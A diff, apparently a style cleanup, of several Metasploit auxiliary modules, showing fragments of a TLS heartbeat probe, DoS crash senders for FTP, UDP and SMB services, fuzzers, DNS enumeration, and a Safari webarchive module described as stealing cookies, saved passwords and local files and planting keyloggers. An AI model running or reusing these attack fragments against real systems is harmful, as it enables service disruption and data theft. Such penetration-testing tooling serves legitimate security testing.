||||
}
|
||||
|
||||
# XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
|
||||
# This should be rewritten with 1.upto() or Enumerable#each or
|
||||
# something
|
||||
# This should be rewritten with 1.upto() or Enumerable#each or
|
||||
# something
|
||||
for x in 1..datastore['RLIMIT']
|
||||
print_status("Sending request #{x} to #{peer}")
|
||||
begin
|
||||
|
@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Steve Jones', #original discoverer
|
||||
'Hoagie <andi[at]void.at>', #original public exploit
|
||||
'Paulino Calderon <calderon[at]websec.mx>', #metasploit module
|
||||
'Steve Jones', # original discoverer
|
||||
'Hoagie <andi[at]void.at>', # original public exploit
|
||||
'Paulino Calderon <calderon[at]websec.mx>', # metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -51,9 +51,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
|
||||
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
|
||||
# Mac OS X: PC control via memcpy to stack ptr
|
||||
# Solaris: PC control via memcpy to stack ptr
|
||||
# Solaris: PC control via memcpy to stack ptr
|
||||
|
||||
stub = lsa_open_policy(dcerpc)
|
||||
stub << NDR.long(1)
|
||||
|
@ -42,32 +42,32 @@ class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
# Client Hello
|
||||
p1 = "\x16" # Content Type: Handshake
|
||||
p1 = "\x16" # Content Type: Handshake
|
||||
p1 << "\x03\x01" # Version: TLS 1.0
|
||||
p1 << "\x00\x7e" # Length: 126
|
||||
p1 << "\x01" # Handshake Type: Client Hello
|
||||
p1 << "\x01" # Handshake Type: Client Hello
|
||||
p1 << "\x00\x00\x7a" # Length: 122
|
||||
p1 << "\x03\x02" # Version: TLS 1.1
|
||||
p1 << ("A" * 32) # Random
|
||||
p1 << "\x00" # Session ID Length: 0
|
||||
p1 << "\x00" # Session ID Length: 0
|
||||
p1 << "\x00\x08" # Cypher Suites Length: 6
|
||||
p1 << "\xc0\x13" # - ECDHE-RSA-AES128-SHA
|
||||
p1 << "\x00\x39" # - DHE-RSA-AES256-SHA
|
||||
p1 << "\x00\x35" # - AES256-SHA
|
||||
p1 << "\x00\xff" # - EMPTY_RENEGOTIATION_INFO_SCSV
|
||||
p1 << "\x01" # Compression Methods Length: 1
|
||||
p1 << "\x00" # - NULL-Compression
|
||||
p1 << "\x01" # Compression Methods Length: 1
|
||||
p1 << "\x00" # - NULL-Compression
|
||||
p1 << "\x00\x49" # Extensions Length: 73
|
||||
p1 << "\x00\x0b" # - Extension: ec_point_formats
|
||||
p1 << "\x00\x04" # Length: 4
|
||||
p1 << "\x03" # EC Points Format Length: 3
|
||||
p1 << "\x00" # - uncompressed
|
||||
p1 << "\x01" # - ansiX962_compressed_prime
|
||||
p1 << "\x02" # - ansiX962_compressed_char2
|
||||
p1 << "\x03" # EC Points Format Length: 3
|
||||
p1 << "\x00" # - uncompressed
|
||||
p1 << "\x01" # - ansiX962_compressed_prime
|
||||
p1 << "\x02" # - ansiX962_compressed_char2
|
||||
p1 << "\x00\x0a" # - Extension: elliptic_curves
|
||||
p1 << "\x00\x34" # Length: 52
|
||||
p1 << "\x00\x32" # Elliptic Curves Length: 50
|
||||
# 25 Elliptic curves:
|
||||
# 25 Elliptic curves:
|
||||
p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a"
|
||||
p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04"
|
||||
p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10"
|
||||
@ -77,7 +77,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||
p1 << "\x00\x00" # Length: 0
|
||||
p1 << "\x00\x0f" # - Extension: Heartbeat
|
||||
p1 << "\x00\x01" # Length: 1
|
||||
p1 << "\x01" # Peer allowed to send requests
|
||||
p1 << "\x01" # Peer allowed to send requests
|
||||
|
||||
|
||||
# Change Cipher Spec Message
|
||||
@ -97,12 +97,12 @@ class Metasploit4 < Msf::Auxiliary
|
||||
# Client Key Exchange, Change Cipher Spec, Encrypted Handshake
|
||||
# AES256-SHA
|
||||
p2_aes_sha = "\x16" # Content Type: Handshake
|
||||
p2_aes_sha << "\x03\x02" # Version: TLS 1.1
|
||||
p2_aes_sha << "\x01\x06" # Length: 262
|
||||
p2_aes_sha << "\x03\x02" # Version: TLS 1.1
|
||||
p2_aes_sha << "\x01\x06" # Length: 262
|
||||
p2_aes_sha << "\x10" # Handshake Type: Client Key Exchange
|
||||
p2_aes_sha << "\x00\x01\x02" # Length: 258
|
||||
p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256
|
||||
p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant)
|
||||
p2_aes_sha << "\x00\x01\x02" # Length: 258
|
||||
p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256
|
||||
p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant)
|
||||
p2_aes_sha << p2_cssm # Change Cipher Spec Message
|
||||
p2_aes_sha << p2_ehm # Encrypted Handshake Message
|
||||
|
||||
@ -112,7 +112,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||
p2_dhe << "\x03\x02" # Version: TLS 1.1
|
||||
p2_dhe << "\x00\x46" # Length: 70
|
||||
p2_dhe << "\x10" # Handshake Type: Client Key Exchange
|
||||
p2_dhe << "\x00\x00\x42" # Length: 66
|
||||
p2_dhe << "\x00\x00\x42" # Length: 66
|
||||
p2_dhe << "\x00\x40" # DH Pubkey Length: 64
|
||||
p2_dhe << ("A" * 64) # DH Pubkey
|
||||
p2_dhe << p2_cssm # Change Cipher Spec Message
|
||||
@ -124,9 +124,9 @@ class Metasploit4 < Msf::Auxiliary
|
||||
p2_ecdhe << "\x03\x02" # Version: TLS 1.1
|
||||
p2_ecdhe << "\x00\x46" # Length: 70
|
||||
p2_ecdhe << "\x10" # Handshake Type: Client Key Exchange
|
||||
p2_ecdhe << "\x00\x00\x42" # Length: 66
|
||||
p2_ecdhe << "\x00\x00\x42" # Length: 66
|
||||
p2_ecdhe << "\x41" # EC DH Pubkey Length: 65
|
||||
# EC DH Pubkey:
|
||||
# EC DH Pubkey:
|
||||
p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8"
|
||||
p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69"
|
||||
p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6"
|
||||
|
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
#Attempt to crash IIS FTP
|
||||
# Attempt to crash IIS FTP
|
||||
begin
|
||||
return unless connect_login
|
||||
print_status('Checking if there is at least one directory ...')
|
||||
|
@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'x000 <3d3n[at]hotmail.com.br>', #Initial disclosure/exploit
|
||||
'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', #Metasploit submission
|
||||
'sinn3r', #Metasploit edit/commit
|
||||
'x000 <3d3n[at]hotmail.com.br>', # Initial disclosure/exploit
|
||||
'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', # Metasploit submission
|
||||
'sinn3r', # Metasploit edit/commit
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
#Send HELLO to target
|
||||
# Send HELLO to target
|
||||
connect_udp
|
||||
print_status("Sending Crash request...")
|
||||
udp_sock.put("HELLO0.83\0")
|
||||
@ -44,13 +44,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#Send DOS packet
|
||||
# Send DOS packet
|
||||
connect_udp(global = true,'RPORT' => port)
|
||||
print_status("Sending DoS packet to #{rhost}:#{port}...")
|
||||
udp_sock.put("Kthxbai")
|
||||
disconnect_udp
|
||||
|
||||
#Check is target is down
|
||||
# Check is target is down
|
||||
connect_udp
|
||||
print_status("Checking target...")
|
||||
udp_sock.put("HELLO0.83\0")
|
||||
|
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
pkt['Payload'].v['DataLenLow'] = dlenlow #<==================
|
||||
pkt['Payload'].v['DataOffset'] = doffset #<====
|
||||
pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====
|
||||
pkt['Payload'].v['ByteCount'] = fillersize#<====
|
||||
pkt['Payload'].v['ByteCount'] = fillersize #<====
|
||||
pkt['Payload'].v['Payload'] = filler
|
||||
|
||||
simple.client.smb_send(pkt.to_s)
|
||||
|
@ -40,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
delimiter = "\x00"*3
|
||||
packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
|
||||
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
|
||||
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
|
||||
0x00, 0x7e].pack("C*")
|
||||
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
|
||||
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
|
||||
0x00, 0x7e].pack("C*")
|
||||
packet << Rex::Text.rand_text_alphanumeric(126)
|
||||
packet << delimiter
|
||||
packet << Rex::Text.rand_text_alphanumeric(16)
|
||||
|
@ -47,26 +47,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def support_ipv6?
|
||||
false
|
||||
end
|
||||
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
def setup
|
||||
super
|
||||
@state = {}
|
||||
end
|
||||
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
def run
|
||||
@fuzzsize=datastore['STARTSIZE'].to_i
|
||||
exploit()
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
# Handler for new FTP client connections
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
def on_client_connect(c)
|
||||
@state[c] = {
|
||||
:name => "#{c.peerhost}:#{c.peerport}",
|
||||
@ -75,20 +67,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:user => nil,
|
||||
:pass => nil
|
||||
}
|
||||
#set up an active data port on port 20
|
||||
# set up an active data port on port 20
|
||||
print_status("Client connected : " + c.peerhost)
|
||||
active_data_port_for_client(c, 20)
|
||||
send_response(c,"","WELCOME",220," "+datastore['WELCOME'])
|
||||
#from this point forward, on_client_data() will take over
|
||||
# from this point forward, on_client_data() will take over
|
||||
end
|
||||
|
||||
def on_client_close(c)
|
||||
@state.delete(c)
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
# Active and Passive data connections
|
||||
#---------------------------------------------------------------------------------
|
||||
def passive_data_port_for_client(c)
|
||||
@state[c][:mode] = :passive
|
||||
if(not @state[c][:passive_sock])
|
||||
@ -140,22 +130,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
nil
|
||||
end
|
||||
|
||||
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
# FTP Client-to-Server Command handlers
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
# FTP Client-to-Server Command handlers
|
||||
def on_client_data(c)
|
||||
#get the client data
|
||||
# get the client data
|
||||
data = c.get_once
|
||||
return if not data
|
||||
#split data into command and arguments
|
||||
# split data into command and arguments
|
||||
cmd,arg = data.strip.split(/\s+/, 2)
|
||||
arg ||= ""
|
||||
|
||||
return if not cmd
|
||||
#convert commands to uppercase and strip spaces
|
||||
# convert commands to uppercase and strip spaces
|
||||
case cmd.upcase.strip
|
||||
|
||||
when 'USER'
|
||||
@ -247,7 +232,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
|
||||
when /^(LIST|NLST|LS)$/
|
||||
#special case - requires active/passive connection
|
||||
# special case - requires active/passive connection
|
||||
print_status("Handling #{cmd.upcase} command")
|
||||
conn = establish_data_connection(c)
|
||||
if(not conn)
|
||||
@ -289,7 +274,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
|
||||
when 'RETR'
|
||||
#special case - requires active/passive connection
|
||||
# special case - requires active/passive connection
|
||||
print_status("Handling #{cmd.upcase} command")
|
||||
conn = establish_data_connection(c)
|
||||
if(not conn)
|
||||
@ -353,11 +338,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
# Fuzzer functions
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
# Do we need to fuzz this command ?
|
||||
def fuzz_this_cmd(cmd)
|
||||
@ -421,7 +402,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("* Fuzz data sent")
|
||||
incr_fuzzsize()
|
||||
else
|
||||
#Do not fuzz
|
||||
# Do not fuzz
|
||||
cmsg = code.to_s + msg
|
||||
cmsg = cmsg.strip
|
||||
c.put("#{cmsg}\r\n")
|
||||
|
@ -175,14 +175,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
else
|
||||
datastr = "\r\n"
|
||||
end
|
||||
#first, check the original header fields and add some others - just for fun
|
||||
# first, check the original header fields and add some others - just for fun
|
||||
myheaders = @send_data[:headers]
|
||||
mysendheaders = @send_data[:headers].dup
|
||||
#get or post ?
|
||||
# get or post ?
|
||||
mysendheaders[:method] = form[:method].upcase
|
||||
myheaders.each do | thisheader |
|
||||
if not headers[thisheader[0]]
|
||||
#add header if needed
|
||||
# add header if needed
|
||||
mysendheaders[thisheader[0]]= thisheader[1]
|
||||
end
|
||||
end
|
||||
@ -300,7 +300,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def get_field_val(input)
|
||||
tmp = input.split(/\=/)
|
||||
#get delimeter
|
||||
# get delimeter
|
||||
tmp2 = tmp[1].strip
|
||||
delim = tmp2[0,1]
|
||||
if delim != "'" && delim != '"'
|
||||
@ -316,7 +316,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
body = body.gsub("\r","")
|
||||
body = body.gsub("\n","")
|
||||
bodydata = body.downcase.split(/<form/)
|
||||
#we need part after <form
|
||||
# we need part after <form
|
||||
totalforms = bodydata.size - 1
|
||||
print_status(" Number of forms : #{totalforms}")
|
||||
formcnt = 0
|
||||
@ -326,7 +326,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
fdata = bodydata[formidx]
|
||||
print_status(" - Enumerating form ##{formcnt+1}")
|
||||
data = fdata.downcase.split(/<\/form>/)
|
||||
#first, get action and name
|
||||
# first, get action and name
|
||||
formdata = data[0].downcase.split(/>/)
|
||||
subdata = formdata[0].downcase.split(/ /)
|
||||
namefound = false
|
||||
@ -375,7 +375,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
namefound = true
|
||||
|
||||
formfields = []
|
||||
#input boxes
|
||||
# input boxes
|
||||
fieldtypemarks = [ '<input', '<select' ]
|
||||
fieldtypemarks.each do | currfieldmark |
|
||||
formfieldcnt=0
|
||||
@ -386,7 +386,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if subdata.size > 1
|
||||
subdata.each do | thisinput |
|
||||
if skipflag == 1
|
||||
#first, find the delimeter
|
||||
# first, find the delimeter
|
||||
fielddata = thisinput.downcase.split(/>/)
|
||||
fields = fielddata[0].split(/ /)
|
||||
fieldname = ""
|
||||
@ -408,7 +408,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
fieldid = get_field_val(thisfield)
|
||||
end
|
||||
if thisfield.match(/^value=/)
|
||||
#special case
|
||||
# special case
|
||||
location = fielddata[0].index(thisfield)
|
||||
delta = fielddata[0].size - location
|
||||
remaining = fielddata[0][location,delta]
|
||||
@ -518,13 +518,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
formfound = response.body.downcase.index("<form")
|
||||
if formfound
|
||||
formdata = get_form_data(response.body)
|
||||
#fuzz !
|
||||
#for each form that needs to be fuzzed
|
||||
# fuzz !
|
||||
# for each form that needs to be fuzzed
|
||||
formdata.each do | thisform |
|
||||
if thisform[:name].length > 0
|
||||
if ((datastore['FORM'].strip == "") || (datastore['FORM'].upcase.strip == thisform[:name].upcase.strip)) && (thisform[:fields].size > 0)
|
||||
print_status("Fuzzing fields in form #{thisform[:name].upcase.strip}")
|
||||
#for each field in this form, fuzz one field at a time
|
||||
# for each field in this form, fuzz one field at a time
|
||||
formfields = thisform[:fields]
|
||||
formfields.each do | thisfield |
|
||||
if thisfield[:name]
|
||||
@ -537,7 +537,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}")
|
||||
end
|
||||
#fuzz headers ?
|
||||
# fuzz headers ?
|
||||
if datastore['FUZZHEADERS'] == true
|
||||
print_status("Fuzzing header fields")
|
||||
do_fuzz_headers(thisform,response.headers)
|
||||
|
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
rescue ::Exception => e
|
||||
last_err = e
|
||||
#ensure
|
||||
# disconnect
|
||||
#disconnect
|
||||
end
|
||||
|
||||
|
||||
|
@ -282,7 +282,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] the XML markup to insert into the webarchive for each unique
|
||||
# iframe (we use one frame per site we want to steal)
|
||||
# iframe (we use one frame per site we want to steal)
|
||||
# @return '' if msf user does not want to poison cache
|
||||
def webarchive_resources_for_poisoning_cache(url)
|
||||
if not should_install_keyloggers? then return '' end
|
||||
@ -320,14 +320,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
|
||||
end
|
||||
|
||||
# @param [script] hash containing HTTP headers from the request
|
||||
# @param script [Hash] containing HTTP headers from the request
|
||||
# @return [String] xml markup for serialized WebResourceResponse containing good
|
||||
# stuff like HTTP/caching headers. Safari appears to do the following:
|
||||
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
|
||||
# [a encodeObject:response forKey:@"WebResourceResponse"];
|
||||
# stuff like HTTP/caching headers. Safari appears to do the following:
|
||||
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
|
||||
# [a encodeObject:response forKey:@"WebResourceResponse"];
|
||||
def web_response_xml(script)
|
||||
# this is a serialized NSHTTPResponse, i'm too lazy to write a
|
||||
# real encoder so yay lets use string interpolation.
|
||||
# real encoder so yay lets use string interpolation.
|
||||
# ripped this straight out of a webarchive save
|
||||
script['content-length'] = script[:body].length
|
||||
whitelist = %w(content-type content-length date etag
|
||||
@ -507,7 +507,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] mark up for embedding the iframes for each URL in a place that is
|
||||
# invisible to the user
|
||||
# invisible to the user
|
||||
def iframes_container_html
|
||||
hidden_style = "position:fixed; left:-600px; top:-600px;"
|
||||
wrap_with_doc do
|
||||
@ -517,8 +517,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] javascript code, wrapped in script tags, that is inserted into the
|
||||
# WebMainResource (parent) frame so that child frames can communicate "up" to the parent
|
||||
# and send data out to the listener
|
||||
# WebMainResource (parent) frame so that child frames can communicate "up" to the parent
|
||||
# and send data out to the listener
|
||||
def communication_js
|
||||
wrap_with_script do
|
||||
%Q|
|
||||
@ -543,7 +543,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] javascript code, wrapped in a script tag, that steals the cookies
|
||||
# and response body/headers, and passes them back up to the parent.
|
||||
# and response body/headers, and passes them back up to the parent.
|
||||
def steal_cookies_for_url(url)
|
||||
wrap_with_script do
|
||||
%Q|
|
||||
@ -568,8 +568,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] javascript code, wrapped in a script tag, that steals local files
|
||||
# and sends them back to the listener. This code is executed in the WebMainResource (parent)
|
||||
# frame, which runs in the file:// protocol
|
||||
# and sends them back to the listener. This code is executed in the WebMainResource (parent)
|
||||
# frame, which runs in the file:// protocol
|
||||
def steal_files
|
||||
return '' unless should_steal_files?
|
||||
urls_str = [datastore['FILE_URLS'], interesting_file_urls.join(' ')].join(' ')
|
||||
@ -595,9 +595,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] javascript code, wrapped in a script tag, that steals autosaved form
|
||||
# usernames and passwords. The attack first tries to render the target URL in an iframe,
|
||||
# and steal populated passwords from there. If the site disables iframes through the
|
||||
# X-Frame-Options header, we try popping open a new window and rendering the site in that.
|
||||
# usernames and passwords. The attack first tries to render the target URL in an iframe,
|
||||
# and steal populated passwords from there. If the site disables iframes through the
|
||||
# X-Frame-Options header, we try popping open a new window and rendering the site in that.
|
||||
def steal_form_data_for_url(url)
|
||||
wrap_with_script do
|
||||
%Q|
|
||||
@ -663,8 +663,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] javascript code, wrapped in script tag, that adds a helper function
|
||||
# called "sendData()" that passes the arguments up to the parent frame, where it is
|
||||
# sent out to the listener
|
||||
# called "sendData()" that passes the arguments up to the parent frame, where it is
|
||||
# sent out to the listener
|
||||
def injected_js_helpers
|
||||
wrap_with_script do
|
||||
%Q|
|
||||
@ -678,7 +678,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] HTML markup that includes a script at the URL we want to poison
|
||||
# We will then install the injected_js_keylogger at the same URL
|
||||
# We will then install the injected_js_keylogger at the same URL
|
||||
def trigger_cache_poison_for_url(url)
|
||||
url_idx = urls.index(url)
|
||||
scripts_to_poison[url_idx].map { |s|
|
||||
@ -686,10 +686,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}.join
|
||||
end
|
||||
|
||||
# @param [String] original_js the original contents of the script file
|
||||
# @param original_js [String] the original contents of the script file
|
||||
# @return [String] the poisoned contents. Once the module has found a valid 304'd script to
|
||||
# poison, it "poisons" it by adding a keylogger, then adds the output as a resource with
|
||||
# appropriate Cache-Control to the webarchive.
|
||||
# poison, it "poisons" it by adding a keylogger, then adds the output as a resource with
|
||||
# appropriate Cache-Control to the webarchive.
|
||||
# @return [String] the original contents if msf user does not want to install keyloggers
|
||||
def inject_js_keylogger(original_js)
|
||||
if not should_install_keyloggers?
|
||||
@ -726,7 +726,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [Array<Array<String>>] list of URLs provided by the user mapped to all of the linked
|
||||
# javascript assets in its HTML response.
|
||||
# javascript assets in its HTML response.
|
||||
def all_script_urls(pages)
|
||||
pages.map do |url|
|
||||
results = []
|
||||
@ -829,7 +829,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
|
||||
# via the FILE_URLS module option.
|
||||
# via the FILE_URLS module option.
|
||||
def interesting_file_urls
|
||||
[
|
||||
'file:///var/log/weekly.out', # may contain usernames
|
||||
@ -849,7 +849,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
(datastore['URLS'] || '').split(/\s+/)
|
||||
end
|
||||
|
||||
# @param [String] input the unencoded string
|
||||
# @param input [String] the unencoded string
|
||||
# @return [String] input with dangerous chars replaced with xml entities
|
||||
def escape_xml(input)
|
||||
input.to_s.gsub("&", "&").gsub("<", "<")
|
||||
|
@ -158,14 +158,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
filename = ""
|
||||
|
||||
url = '/CFIDE/administrator/index.cfm'
|
||||
# print_status("Getting index...")
|
||||
# print_status("Getting index...")
|
||||
res = send_request_cgi({
|
||||
'uri' => url,
|
||||
'method' => 'GET',
|
||||
'Connection' => "keep-alive",
|
||||
'Accept-Encoding' => "zip,deflate",
|
||||
})
|
||||
# print_status("Got back: #{res.inspect}")
|
||||
# print_status("Got back: #{res.inspect}")
|
||||
return if not res
|
||||
return if not res.body or not res.code
|
||||
return if not res.code.to_i == 200
|
||||
|
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def srvqry(dom)
|
||||
results = []
|
||||
#Most common SRV Records
|
||||
# Most common SRV Records
|
||||
srvrcd = [
|
||||
'_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
|
||||
'_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',
|
||||
|
@ -51,7 +51,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
], self.class)
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
def switchdns(target)
|
||||
if not datastore['NS'].nil?
|
||||
print_status("Using DNS Server: #{datastore['NS']}")
|
||||
@ -71,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
def wildcard(target)
|
||||
rendsub = rand(10000).to_s
|
||||
query = @res.query("#{rendsub}.#{target}", "A")
|
||||
@ -85,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return false
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
def genrcd(target)
|
||||
print_status("Retrieving general DNS records")
|
||||
query = @res.search(target)
|
||||
@ -167,7 +166,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
def tldexpnd(targetdom,nssrv)
|
||||
target = targetdom.scan(/(\S*)[.]\w*\z/).join
|
||||
target.chomp!
|
||||
@ -178,13 +177,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
i, a = 0, []
|
||||
tlds = [
|
||||
"com", "org", "net", "edu", "mil", "gov", "uk", "af", "al", "dz",
|
||||
"as", "ad", "ao", "ai", "aq", "ag", "ar", "am", "aw", "ac","au",
|
||||
"as", "ad", "ao", "ai", "aq", "ag", "ar", "am", "aw", "ac", "au",
|
||||
"at", "az", "bs", "bh", "bd", "bb", "by", "be", "bz", "bj", "bm",
|
||||
"bt", "bo", "ba", "bw", "bv", "br", "io", "bn", "bg", "bf", "bi",
|
||||
"kh", "cm", "ca", "cv", "ky", "cf", "td", "cl", "cn", "cx", "cc",
|
||||
"co", "km", "cd", "cg", "ck", "cr", "ci", "hr", "cu", "cy", "cz",
|
||||
"co", "km", "cd", "cg", "ck", "cr", "ci", "hr", "cu", "cy", "cz",
|
||||
"dk", "dj", "dm", "do", "tp", "ec", "eg", "sv", "gq", "er", "ee",
|
||||
"et", "fk", "fo", "fj", "fi", "fr", "gf", "pf", "tf", "ga", "gm",
|
||||
"et", "fk", "fo", "fj", "fi", "fr", "gf", "pf", "tf", "ga", "gm",
|
||||
"ge", "de", "gh", "gi", "gr", "gl", "gd", "gp", "gu", "gt", "gg",
|
||||
"gn", "gw", "gy", "ht", "hm", "va", "hn", "hk", "hu", "is", "in",
|
||||
"id", "ir", "iq", "ie", "im", "il", "it", "jm", "jp", "je", "jo",
|
||||
@ -221,7 +220,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
def dnsbrute(target, wordlist, nssrv)
|
||||
print_status("Running bruteforce against domain #{target}")
|
||||
arr = []
|
||||
@ -250,7 +248,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
def bruteipv6(target, wordlist, nssrv)
|
||||
print_status("Bruteforcing IPv6 addresses against domain #{target}")
|
||||
arr = []
|
||||
@ -283,7 +280,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
def reverselkp(iprange,nssrv)
|
||||
print_status("Running reverse lookup against IP range #{iprange}")
|
||||
if not nssrv.nil?
|
||||
@ -327,12 +323,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
tl.delete_if { |t| not t.alive? }
|
||||
end
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
#SRV Record Enumeration
|
||||
|
||||
# SRV Record Enumeration
|
||||
def srvqry(dom,nssrv)
|
||||
print_status("Enumerating SRV records for #{dom}")
|
||||
i, a = 0, []
|
||||
#Most common SRV Records
|
||||
# Most common SRV Records
|
||||
srvrcd = [
|
||||
"_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp","_test._tcp.",
|
||||
"_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
|
||||
@ -354,8 +350,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
#For Performing Zone Transfers
|
||||
# For Performing Zone Transfers
|
||||
def axfr(target, nssrv)
|
||||
print_status("Performing zone transfer against all nameservers in #{target}")
|
||||
if not nssrv.nil?
|
||||
